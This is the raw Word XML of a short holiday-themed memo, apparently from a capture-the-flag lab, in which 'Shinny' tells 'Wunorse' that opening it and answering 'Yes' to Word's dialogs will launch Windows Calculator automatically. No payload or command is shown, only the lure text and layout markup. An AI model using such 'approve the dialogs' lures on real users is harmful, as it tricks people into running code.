you.</w:t></w:r></w:p><w:p><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr></w:p><w:p><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr><w:t>Open this memo in Microsoft Word. Answer "Yes" to the dialogs, and it will start Windows Calculator for you automatically.</w:t></w:r></w:p><w:p><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr></w:p><w:p><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr><w:t>Please try not to delete this document as well.</w:t></w:r></w:p><w:p><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr></w:p><w:p><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr><w:t>Sincerely,</w:t></w:r></w:p><w:p><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr></w:p><w:p><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr><w:t>Shinny</w:t></w:r></w:p></w:txbxContent></wps:txbx><wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" upright="1"><a:noAutofit/></wps:bodyPr></wps:wsp></a:graphicData></a:graphic><wp14:sizeRelH relativeFrom="page"><wp14:pctWidth>0</wp14:pctWidth></wp14:sizeRelH><wp14:sizeRelV relativeFrom="page"><wp14:pctHeight>0</wp14:pctHeight></wp14:sizeRelV></wp:anchor></w:drawing></mc:Choice><mc:Fallback><w:pict><v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe"><v:stroke joinstyle="miter"/><v:path gradientshapeok="t" o:connecttype="rect"/></v:shapetype><v:shape id="Text Box 2" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:-63pt;margin-top:36.75pt;width:534pt;height:290.25pt;z-index:251654656;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:page;mso-height-relative:page;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f"><v:textbox><w:txbxContent><w:p><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr><w:t>I don't know how you do it Wunorse. I've restored your Windows Calculator shortcut at least a dozen times. Instead of creating it again, I've created a special document for you.</w:t></w:r></w:p><w:p><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr></w:p><w:p><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr><w:t>Open this memo in Microsoft Word. Answer "Yes" to the dialogs, and it will start Windows Calculator for you automatically.</w:t></w:r></w:p><w:p><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr></w:p><w:p><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr><w:t>Please try not to delete this document as well.</w:t></w:r></w:p><w:p><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr></w:p><w:p><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr><w:t>Sincerely,</w:t></w:r></w:p><w:p><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr><w:bookmarkStart w:id="1" w:name="_GoBack"/><w:bookmarkEnd w:id="1"/></w:p><w:p><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr><w:t>Shinny</w:t></w:r></w:p></w:txbxContent></v:textbox></v:shape></w:pict></mc:Fallback></mc:AlternateContent></w:r></w:p><w:sectPr><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>
-
+<file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+  <w:body>
+    <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+    <w:bookmarkEnd w:id="0"/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251657728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>1828800</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>114300</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="4572000" cy="1914525"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:wrapNone/>
+                <wp:docPr id="7" name="Text Box 28"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="4572000" cy="1914525"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:noFill/>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                        <a:extLst>
+                          <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
+                            <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
+                              <a:solidFill>
+                                <a:srgbClr val="FFFFFF"/>
+                              </a:solidFill>
+                            </a14:hiddenFill>
+                          </a:ext>
+                          <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
+                            <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
+                              <a:solidFill>
+                                <a:srgbClr val="000000"/>
+                              </a:solidFill>
+                              <a:miter lim="800000"/>
+                              <a:headEnd/>
+                              <a:tailEnd/>
+                            </a14:hiddenLine>
+                          </a:ext>
+                        </a:extLst>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyText"/>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/>
+                                <w:b/>
+                                <w:bCs/>
+                                <w:color w:val="FF0000"/>
+                                <w:sz w:val="280"/>
+                                <w:szCs w:val="280"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/>
+                                <w:b/>
+                                <w:bCs/>
+                                <w:color w:val="669900"/>
+                                <w:sz w:val="280"/>
+                                <w:szCs w:val="280"/>
+                              </w:rPr>
+                              <w:t>M</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/>
+                                <w:b/>
+                                <w:bCs/>
+                                <w:color w:val="FF0000"/>
+                                <w:sz w:val="280"/>
+                                <w:szCs w:val="280"/>
+                              </w:rPr>
+                              <w:t>E</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/>
+                                <w:b/>
+                                <w:bCs/>
+                                <w:color w:val="669900"/>
+                                <w:sz w:val="280"/>
+                                <w:szCs w:val="280"/>
+                              </w:rPr>
+                              <w:t>M</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/>
+                                <w:b/>
+                                <w:bCs/>
+                                <w:color w:val="FF0000"/>
+                                <w:sz w:val="280"/>
+                                <w:szCs w:val="280"/>
+                              </w:rPr>
+                              <w:t>O</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" upright="1">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="page">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="page">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                <v:stroke joinstyle="miter"/>
+                <v:path gradientshapeok="t" o:connecttype="rect"/>
+              </v:shapetype>
+              <v:shape id="Text Box 28" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:2in;margin-top:9pt;width:5in;height:150.75pt;z-index:251657728;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:page;mso-height-relative:page;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="BodyText"/>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/>
+                          <w:b/>
+                          <w:bCs/>
+                          <w:color w:val="FF0000"/>
+                          <w:sz w:val="280"/>
+                          <w:szCs w:val="280"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/>
+                          <w:b/>
+                          <w:bCs/>
+                          <w:color w:val="669900"/>
+                          <w:sz w:val="280"/>
+                          <w:szCs w:val="280"/>
+                        </w:rPr>
+                        <w:t>M</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/>
+                          <w:b/>
+                          <w:bCs/>
+                          <w:color w:val="FF0000"/>
+                          <w:sz w:val="280"/>
+                          <w:szCs w:val="280"/>
+                        </w:rPr>
+                        <w:t>E</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/>
+                          <w:b/>
+                          <w:bCs/>
+                          <w:color w:val="669900"/>
+                          <w:sz w:val="280"/>
+                          <w:szCs w:val="280"/>
+                        </w:rPr>
+                        <w:t>M</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/>
+                          <w:b/>
+                          <w:bCs/>
+                          <w:color w:val="FF0000"/>
+                          <w:sz w:val="280"/>
+                          <w:szCs w:val="280"/>
+                        </w:rPr>
+                        <w:t>O</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>-800100</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>-571500</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="2532380" cy="2820670"/>
+                <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+                <wp:wrapNone/>
+                <wp:docPr id="6" name="Text Box 31"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="2532380" cy="2820670"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:noFill/>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                        <a:extLst>
+                          <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
+                            <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
+                              <a:solidFill>
+                                <a:srgbClr val="FFFFFF"/>
+                              </a:solidFill>
+                            </a14:hiddenFill>
+                          </a:ext>
+                          <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
+                            <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
+                              <a:solidFill>
+                                <a:srgbClr val="000000"/>
+                              </a:solidFill>
+                              <a:miter lim="800000"/>
+                              <a:headEnd/>
+                              <a:tailEnd/>
+                            </a14:hiddenLine>
+                          </a:ext>
+                        </a:extLst>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:r>
+                              <w:rPr>
+                                <w:noProof/>
+                              </w:rPr>
+                              <w:drawing>
+                                <wp:inline distT="0" distB="0" distL="0" distR="0">
+                                  <wp:extent cx="2352675" cy="2733675"/>
+                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                                  <wp:docPr id="1" name="Picture 1" descr="xmas_tree"/>
+                                  <wp:cNvGraphicFramePr>
+                                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                                  </wp:cNvGraphicFramePr>
+                                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                        <pic:nvPicPr>
+                                          <pic:cNvPr id="0" name="Picture 1" descr="xmas_tree"/>
+                                          <pic:cNvPicPr>
+                                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                          </pic:cNvPicPr>
+                                        </pic:nvPicPr>
+                                        <pic:blipFill>
+                                          <a:blip r:embed="rId7">
+                                            <a:extLst>
+                                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                              </a:ext>
+                                            </a:extLst>
+                                          </a:blip>
+                                          <a:srcRect/>
+                                          <a:stretch>
+                                            <a:fillRect/>
+                                          </a:stretch>
+                                        </pic:blipFill>
+                                        <pic:spPr bwMode="auto">
+                                          <a:xfrm>
+                                            <a:off x="0" y="0"/>
+                                            <a:ext cx="2352675" cy="2733675"/>
+                                          </a:xfrm>
+                                          <a:prstGeom prst="rect">
+                                            <a:avLst/>
+                                          </a:prstGeom>
+                                          <a:noFill/>
+                                          <a:ln>
+                                            <a:noFill/>
+                                          </a:ln>
+                                        </pic:spPr>
+                                      </pic:pic>
+                                    </a:graphicData>
+                                  </a:graphic>
+                                </wp:inline>
+                              </w:drawing>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" upright="1">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="page">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="page">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape id="Text Box 31" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:-63pt;margin-top:-45pt;width:199.4pt;height:222.1pt;z-index:251658752;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:page;mso-height-relative:page;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:r>
+                        <w:rPr>
+                          <w:noProof/>
+                        </w:rPr>
+                        <w:drawing>
+                          <wp:inline distT="0" distB="0" distL="0" distR="0">
+                            <wp:extent cx="2352675" cy="2733675"/>
+                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                            <wp:docPr id="1" name="Picture 1" descr="xmas_tree"/>
+                            <wp:cNvGraphicFramePr>
+                              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                            </wp:cNvGraphicFramePr>
+                            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                  <pic:nvPicPr>
+                                    <pic:cNvPr id="0" name="Picture 1" descr="xmas_tree"/>
+                                    <pic:cNvPicPr>
+                                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                    </pic:cNvPicPr>
+                                  </pic:nvPicPr>
+                                  <pic:blipFill>
+                                    <a:blip r:embed="rId8">
+                                      <a:extLst>
+                                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                        </a:ext>
+                                      </a:extLst>
+                                    </a:blip>
+                                    <a:srcRect/>
+                                    <a:stretch>
+                                      <a:fillRect/>
+                                    </a:stretch>
+                                  </pic:blipFill>
+                                  <pic:spPr bwMode="auto">
+                                    <a:xfrm>
+                                      <a:off x="0" y="0"/>
+                                      <a:ext cx="2352675" cy="2733675"/>
+                                    </a:xfrm>
+                                    <a:prstGeom prst="rect">
+                                      <a:avLst/>
+                                    </a:prstGeom>
+                                    <a:noFill/>
+                                    <a:ln>
+                                      <a:noFill/>
+                                    </a:ln>
+                                  </pic:spPr>
+                                </pic:pic>
+                              </a:graphicData>
+                            </a:graphic>
+                          </wp:inline>
+                        </w:drawing>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>-1257300</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>-914400</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="7886700" cy="228600"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:wrapNone/>
+                <wp:docPr id="5" name="Rectangle 32"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr>
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="7886700" cy="228600"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="89AA00"/>
+                        </a:solidFill>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                        <a:extLst>
+                          <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
+                            <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
+                              <a:solidFill>
+                                <a:srgbClr val="000000"/>
+                              </a:solidFill>
+                              <a:miter lim="800000"/>
+                              <a:headEnd/>
+                              <a:tailEnd/>
+                            </a14:hiddenLine>
+                          </a:ext>
+                        </a:extLst>
+                      </wps:spPr>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" upright="1">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="page">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="page">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:rect w14:anchorId="7A6F33F3" id="Rectangle 32" o:spid="_x0000_s1026" style="position:absolute;margin-left:-99pt;margin-top:-1in;width:621pt;height:18pt;z-index:251659776;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:page;mso-height-relative:page;v-text-anchor:top" o:gfxdata="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" fillcolor="#89aa00" stroked="f"/>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251655680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>-3543300</wp:posOffset>
+                </wp:positionH>
